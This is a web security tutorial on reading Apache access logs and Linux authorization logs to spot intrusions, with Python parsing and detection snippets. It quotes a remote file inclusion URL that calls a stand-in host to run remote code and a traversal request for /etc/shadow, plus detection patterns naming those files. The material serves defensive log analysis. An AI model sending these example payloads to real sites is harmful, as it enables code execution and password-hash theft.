Linux and our web applications store the details of processed actions in log files, and we use these to track anything from server performance to visitors and vulnerabilities.
For our purposes, we are primarily interested in the access log. It records every web request from client to server, successful or failed, and so helps us to trace malicious activity and isolate site or server weaknesses which we can then secure.
How you check the access log varies between web hosts. For shared types, most commonly using cPanel, there's a panel area called Logs, so there's a start. To scrutinize recent activity, click on Latest Visitors, then click through to your site. Historical records, on the other hand, often need enabling so, again with cPanel, this time click on the dashboard's Raw Access Logs icon, check the boxes as shown here and click on Save:
Unmanaged types, meanwhile, will have an access log somewhere or other, by default in the /var/log/apache2 folder or often in a folder parallel to the relevant site's web root directory. You can view log activity in real time by using the tail command's -f parameter:
Reading the Common Log Format (CLF)
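Access logs are typically set out in what's called CLF or, where the referrer and user agent are appended as they are here, in its extended cousin, the combined log format. Here's an example entry: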
Records can be divvied up into four sections: what visitor wants what file, is from where, and using what client (or user agent).
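To see that split in practice, here is a minimal Python sketch that pulls one entry apart into named fields. It assumes the entry follows Apache's combined layout; the sample line, the LOG_PATTERN regular expression and the parse_entry helper are all made up for illustration and are not taken from any real log.

```python
import re

# Hypothetical entry in the combined layout (CLF plus referrer and user agent).
# Every value below is invented for illustration.
SAMPLE = ('203.0.113.7 - - [10/Oct/2011:13:55:36 +0000] '
          '"GET /wp-login.php HTTP/1.1" 200 1405 '
          '"http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"')

# Assumed pattern: the referrer and user agent are optional, so plain CLF
# lines match too.
LOG_PATTERN = re.compile(
    r'(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)")?'
)


def parse_entry(line):
    """Return a dict of fields for one log line, or None if it does not match."""
    match = LOG_PATTERN.match(line)
    if match is None:
        return None
    fields = match.groupdict()
    # The request reads "METHOD path protocol"; malformed ones may lack parts.
    parts = fields["request"].split()
    fields["method"] = parts[0] if parts else None
    fields["path"] = parts[1] if len(parts) > 1 else None
    fields["protocol"] = parts[2] if len(parts) > 2 else None
    return fields


entry = parse_entry(SAMPLE)
print(entry["ip"], entry["method"], entry["path"], entry["status"], entry["size"])
# 203.0.113.7 GET /wp-login.php 200 1405
```

The pattern is deliberately forgiving rather than exhaustive: a user-agent string containing escaped quotes, for instance, would need a stricter expression.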
A user agent is the client making the web connection, such as a browser. When a client connects to a site, it discloses a user-agent string detailing the client, its version and the underlying operating system. This information helps a server decide how best to return data, for example according to browser-specific stylesheet rules.
This is the IP address, apparently, from where the client makes a request:
The request opens with the HTTP method. Three are relevant here: POST to submit content via, say, a form; HEAD to query a page without retrieving its content, for example to check for changes; GET to retrieve a file such as an image, a stylesheet, or a favicon.
If someone wants to GET a page, there will be as many individual log records, one per request, as there are individual files that, cumulatively, make up the page. The IP address, being a common denominator, can help organize requests into groups.
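As a rough illustration of that grouping, the following Python sketch collects requested paths under the IP that asked for them. The log lines and the group_by_ip helper are invented for the example, which assumes the IP is the first field and the request is the first quoted string on each line.

```python
from collections import defaultdict

# Invented log lines: one page view by 203.0.113.7 pulls in three files.
LINES = [
    '203.0.113.7 - - [10/Oct/2011:13:55:36 +0000] "GET /about/ HTTP/1.1" 200 1405',
    '203.0.113.7 - - [10/Oct/2011:13:55:36 +0000] "GET /style.css HTTP/1.1" 200 820',
    '198.51.100.23 - - [10/Oct/2011:13:55:37 +0000] "GET /feed/ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2011:13:55:37 +0000] "GET /favicon.ico HTTP/1.1" 200 318',
]


def group_by_ip(lines):
    """Map each client IP (the first field) to the list of paths it requested."""
    groups = defaultdict(list)
    for line in lines:
        pieces = line.split('"')
        if len(pieces) < 2:
            continue  # no quoted request on this line, so skip it
        ip = line.split(" ", 1)[0]
        parts = pieces[1].split()  # "METHOD path protocol"
        path = parts[1] if len(parts) > 1 else pieces[1]
        groups[ip].append(path)
    return dict(groups)


groups = group_by_ip(LINES)
for ip, paths in groups.items():
    print(ip, len(paths), paths)
```

Bear in mind that several visitors behind one proxy share an IP, so a group is a hint rather than proof of a single visitor.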
The file path, relative to the web root, is now noted along with the request protocol, generally HTTP/1.0 or HTTP/1.1. Then we have the status code, telling us how the web server answered the request, such as by giving a 200 for OK or a 404 for Not Found. Finally this section gives the size of the response in bytes, so that's 1405 here:
The web address value is where we may see attempted attacks. Your page may be called some-file.php, but that doesn't stop a hacker amending the request using, for example, Remote or Local File Inclusion (RFI or LFI) attacks. These attempt to make your PHP either execute a remote exploit or read out a local file, respectively, like these:
- RFI – http://somesite.com/some-file.php?page=http://badsite.com/bad.txt
- LFI – http://somesite.com/some-file.php?page=../../../etc/shadow%00
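This RFI example wants PHP to run the dodgy code in bad.txt, perhaps to open a backdoor to the server. The LFI example wants a screen printout of your password hashes, the trailing %00 being an encoded null byte intended to cut off any file extension that the script appends.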
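Requests like these two can be flagged automatically. The Python sketch below is one hedged way to go about it: the two regular expressions and the classify_request helper are illustrative assumptions, tuned only to the examples above, and will certainly miss cleverer variations.

```python
import re
from urllib.parse import unquote

# Illustrative heuristics only. Real attacks vary and these will miss some.
# RFI: a parameter whose value is itself a remote URL.
RFI_PATTERN = re.compile(r'=\s*(?:https?|ftp)://', re.IGNORECASE)
# LFI: directory traversal, well-known sensitive files, or a null byte.
LFI_PATTERN = re.compile(r'\.\./|/etc/(?:passwd|shadow)|\x00')


def classify_request(path):
    """Return the labels ('RFI', 'LFI') that a requested path triggers."""
    decoded = unquote(path)  # turns %00 into a null byte, %2e into '.', etc.
    labels = []
    if RFI_PATTERN.search(decoded):
        labels.append("RFI")
    if LFI_PATTERN.search(decoded):
        labels.append("LFI")
    return labels


print(classify_request("/some-file.php?page=http://badsite.com/bad.txt"))  # ['RFI']
print(classify_request("/some-file.php?page=../../../etc/shadow%00"))      # ['LFI']
print(classify_request("/some-file.php?page=about"))                       # []
```

Decoding the path first matters because attackers often percent-encode the tell-tale characters to slip past naive string matching.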
This is the referrer, the place where the user has come from:
The user-agent string details the browser and operating system originating the request:
Exercising the logged data
Lots of information, and it gives us an idea how traffic analysis tools work, among other things. Before we get too excited, though, remember that the IP, referring site, and user agent can all be faked, so going after a hacker's “IP address” can be a waste of time.
Then again, what we can deduce are some common values, particularly the IP and timeframe. For example, we can take the IP and run a search to see what else this visitor has been up to, both in this and other sessions. Those timestamps, meanwhile, help us to set down a sequential pattern of events.
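Here is a small Python sketch of that idea: pick out one IP's requests and put them in time order. The sample lines and the timeline_for helper are hypothetical, and the timestamp format is assumed to be Apache's usual day/month/year layout with English month abbreviations.

```python
from datetime import datetime

# Invented lines, deliberately out of order as if merged from rotated logs.
LINES = [
    '203.0.113.7 - - [10/Oct/2011:14:02:10 +0000] "POST /wp-login.php HTTP/1.1" 200 2210',
    '198.51.100.23 - - [10/Oct/2011:13:58:00 +0000] "GET / HTTP/1.1" 200 1405',
    '203.0.113.7 - - [10/Oct/2011:13:55:36 +0000] "GET /wp-login.php HTTP/1.1" 200 1405',
]


def timeline_for(ip, lines):
    """Return (timestamp, request) pairs for one IP, oldest first."""
    events = []
    for line in lines:
        if line.split(" ", 1)[0] != ip:
            continue
        stamp = line[line.index("[") + 1:line.index("]")]
        # %b expects English month names, which holds in the default C locale.
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        events.append((when, line.split('"')[1]))
    return sorted(events)


for when, request in timeline_for("203.0.113.7", LINES):
    print(when.isoformat(), request)
```

Run against logs from several days, the same function would show whether the visitor came back for another go.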
Chicken and egg with logging plugins
Our analysis is empowered further when used in conjunction with other tools such as the WordPress Firewall 2 plugin which we installed in Setup an Anti-Malware Suite for WordPress, the LBAK User Tracking plugin which, guess what, tracks users, or the WordPress File Monitor which records file changes. In the case of the latter, for example, once e-mail-alerted to a file change, you can run a search of your logs for that file and the time of the change, noting the corresponding IP before searching for the IP to see what, if any, other mischief has been at play:
This investigation can be a bit chicken and egg, particularly as you learn about various log files and invidious attack scenarios but, given a little practice, it proves a superb way to employ knowledge to stifle future attacks by hardening your system.
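The file-change search described above might be sketched in Python like so. Everything here is an assumption made for illustration: the log lines, the theme file path, the alert time, the five-minute window and the ips_near_change helper.

```python
from datetime import datetime, timedelta, timezone

# Invented lines. Only the first touches the changed file near the alert time.
LINES = [
    '203.0.113.7 - - [10/Oct/2011:14:02:10 +0000] "POST /wp-content/themes/example/functions.php HTTP/1.1" 200 512',
    '198.51.100.23 - - [10/Oct/2011:09:15:00 +0000] "GET /wp-content/themes/example/functions.php HTTP/1.1" 200 0',
    '192.0.2.44 - - [10/Oct/2011:14:02:30 +0000] "GET /index.php HTTP/1.1" 200 1405',
]


def ips_near_change(lines, path_fragment, changed_at, window=timedelta(minutes=5)):
    """Return the IPs that requested path_fragment within window of changed_at."""
    suspects = set()
    for line in lines:
        if path_fragment not in line:
            continue
        stamp = line[line.index("[") + 1:line.index("]")]
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        if abs(when - changed_at) <= window:
            suspects.add(line.split(" ", 1)[0])
    return suspects


# Hypothetical time reported by a file-change alert.
alert_time = datetime(2011, 10, 10, 14, 3, 0, tzinfo=timezone.utc)
suspects = ips_near_change(LINES, "functions.php", alert_time)
print(suspects)  # {'203.0.113.7'}
```

Each IP returned is then a starting point for a wider search of the same logs.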
Legwork for access logs
Here's a sharp tool from the experienced Steven Whitney to help flag those hacking attempts that your site has, hopefully, fended off. Just paste your log and don't freak out:
Finding decent online articles about logging is no mean feat which probably is a sign that not enough of us read them. Then again, Search Security has a superb piece called “How to spot attacks through Apache web server analysis”. You'll have to register, for free, but you should anyway, scouring this great site:
Logs and hosting types
Unmanaged hosting gives access to a wider array of logs, all of which work with not dissimilar logic to our access log. While managed and shared hosting users don't have the same responsibility for server security, unmanaged types can certainly benefit greatly from assessing these files.
For those with root access, the system log files, as opposed to site-specific log files, are generally found in the /var/log directory and can be listed like this:
Checking the authorization log
We won't detail every log but we'll check on who is accessing the server or running privileged tasks. For this, depending on your Linux distribution, we peruse either auth.log (Debian and Ubuntu) or secure (Red Hat and CentOS). Rather than opening the file with an editor, you can scroll it like this:
.. pressing Return to move down the page. Or just check the last 10 records like this:
Check for SSH logins by specifying its daemon, or process, using grep:
Query the /var/log/lastlog file to check each user's most recent server login:
Or you can specify, say, the last 10 logins for a specified user like this:
Query the faillog file for failed login attempts with this shortcut:
And check the wtmp log to see what users are logged into the server and doing what:
That's just a taste of the key security logs but there are other useful system logs such as messages, as well as application-specific logs. If you can't find a log file in the default folder then check its location in the relevant program's configuration file.
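If you would rather script these checks than run them by hand, the Python sketch below mimics two of them: showing the last few records and picking out SSH daemon entries. The auth log lines are invented in the usual syslog layout, and last_records and sshd_records are hypothetical helper names.

```python
from collections import deque

# Invented lines in the usual syslog layout of an authorization log.
AUTH_LINES = [
    "Oct 10 13:55:01 host CRON[2101]: pam_unix(cron:session): session opened for user root",
    "Oct 10 13:56:12 host sshd[2150]: Failed password for invalid user admin from 203.0.113.7 port 50122 ssh2",
    "Oct 10 13:57:40 host sshd[2161]: Accepted password for alice from 198.51.100.23 port 40022 ssh2",
    "Oct 10 13:58:03 host sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get update",
]


def last_records(lines, count=10):
    """Return the final count lines, keeping only that many in memory."""
    return list(deque(lines, maxlen=count))


def sshd_records(lines):
    """Return only the lines written by the SSH daemon."""
    return [line for line in lines if "sshd[" in line]


for line in sshd_records(last_records(AUTH_LINES)):
    print(line)
```

To try it on a real server, pass an open file object instead of AUTH_LINES, bearing in mind that reading the authorization log generally requires root privileges.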
Securing and parsing logs
Having learned how to audit log files we've got an idea as to their value.
So do hackers.
You can bet your bottom dollar that if they can collar your server then they'll try to cover their tracks in the log files. Unmanaged types should exercise some best practice here, both to secure logs and to better protect the sites and server by properly managing them.
Use a tool such as OSSEC – which wpCop installs and configures in Setup OSSEC for Integrity, Logs & Alerts – to manage multiple logs and to do things such as send alerts or block IPs when malicious activity swings by. The firewall we look at in Simplify iptables with ConfigServer Firewall also helps and many swear by Fail2ban:
Consider piping encrypted logs to an external box using something such as Syslog-ng:
Good news. Logging may be dull as ditchwater but you can be sure that your WordPress sites and the underlying server are all the safer for your understanding of how the logs work, which is which and how to read them.